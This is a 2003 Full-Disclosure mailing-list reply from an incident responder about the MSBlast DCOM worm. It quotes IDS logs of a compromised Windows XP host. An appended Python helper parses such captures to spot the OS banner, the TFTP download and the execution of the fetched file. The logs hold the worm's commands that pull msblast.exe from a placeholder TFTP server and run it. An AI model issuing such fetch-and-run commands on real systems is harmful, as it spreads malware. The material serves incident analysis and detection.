
Re: [Full-Disclosure] DCOM Worm?



On Mon, 11 Aug 2003, Carl Sager wrote:

> Aha!  The worm is using the 2k offsets and corrupts
> the DCOM RPC service on XP, which makes the OS
> automatically shut down after 1 minute.  Patch up or
> use a firewall (or well, just tell any ignorant end
> users to do so) and you'll be good!

You sure about that?  I'm seeing it compromise XP hosts as well.  Maybe it
randomly switches between offsets?

In fact, IDS logs from our first compromised host:

Microsoft Windows XP [Version 5.1.2600]Microsoft Windows XP [Version
5.1.2600]tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
{D}{A}
(C) Copyright 1985-2001 Microsoft Corp.{D}{A}
{D}{A}
C:\WINDOWS\System32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
{D}{A}
(C) Copyright 1985-2001 Microsoft Corp.{D}{A}
{D}{A}
C:\WINDOWS\System32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
start msblast.exe{A}
start msblast.exe{A}
msblast.exe{A}
msblast.exe{A}



-- 
Jordan Wiens, CISSP
UF Network Incident Response Team
(352)392-2061
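An added example, not part of this mail or of any tool it mentions: a small Python triage helper that re-reads an IDS session capture in the {D}/{A} form quoted above, pulls out the OS banner, the tftp GET and the execution of the fetched file, so a responder can confirm from the log alone which OS version answered and whether the downloaded file was actually run. The sample capture is constructed to mirror the lines above; aaa.bbb.ccc.ddd is the mail's own placeholder for the TFTP server, and the {D}/{A} notation is assumed to mean CR (0x0D) and LF (0x0A).

```python
import re
# Constructed sample modelled on the IDS capture quoted in the mail: the sensor
# renders CR as {D} and LF as {A}; aaa.bbb.ccc.ddd is the mail's own placeholder.
SAMPLE_CAPTURE = (
    "Microsoft Windows XP [Version 5.1.2600]tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}\n"
    "{D}{A}\n"
    "(C) Copyright 1985-2001 Microsoft Corp.{D}{A}\n"
    "C:\\WINDOWS\\System32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}\n"
    "tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}\n"
    "start msblast.exe{A}\n"
    "msblast.exe{A}\n"
)
OS_BANNER = re.compile(r"Microsoft Windows (\w+) \[Version ([\d.]+)\]")
TFTP_FETCH = re.compile(r"tftp\s+-i\s+(\S+)\s+GET\s+(\S+)", re.IGNORECASE)
# "foo.exe" or "start foo.exe", optionally preceded by a cmd.exe prompt.
EXEC_CMD = re.compile(r"^(?:.*>)?\s*(?:start\s+)?([\w.-]+\.exe)\s*$", re.IGNORECASE)

def normalize_lines(capture):
    # Turn the {D}/{A} markers back into CR/LF, then drop empty lines.
    text = capture.replace("{D}", "\r").replace("{A}", "\n")
    return [ln.strip() for ln in text.splitlines() if ln.strip()]

def extract_events(capture):
    # One record per security-relevant action seen in the captured session.
    events = []
    for line in normalize_lines(capture):
        banner = OS_BANNER.search(line)
        if banner:
            events.append({"kind": "banner", "os": banner.group(1), "version": banner.group(2)})
        fetch, run = TFTP_FETCH.search(line), EXEC_CMD.match(line)
        if fetch:
            events.append({"kind": "tftp_fetch", "server": fetch.group(1), "file": fetch.group(2)})
        elif run:
            events.append({"kind": "exec", "file": run.group(1)})
    return events

def assess(capture):
    # Which OS answered, what was pulled over TFTP, and whether it was then run.
    fetched, executed, victim_os = {}, set(), None
    for ev in extract_events(capture):
        if ev["kind"] == "banner" and victim_os is None:
            victim_os = ev["os"] + " " + ev["version"]
        elif ev["kind"] == "tftp_fetch":
            fetched.setdefault(ev["file"].lower(), set()).add(ev["server"])
        elif ev["kind"] == "exec":
            executed.add(ev["file"].lower())
    return {"victim_os": victim_os, "fetched": sorted(fetched),
            "tftp_servers": sorted({s for v in fetched.values() for s in v}),
            "executed": sorted(executed),
            "fetched_then_executed": sorted(set(fetched) & executed)}
```

Run against the capture in this mail, the banner field is what settles the XP-versus-2k question for that host, and a non-empty fetched_then_executed list is the point at which the box should be treated as compromised rather than merely probed.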


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html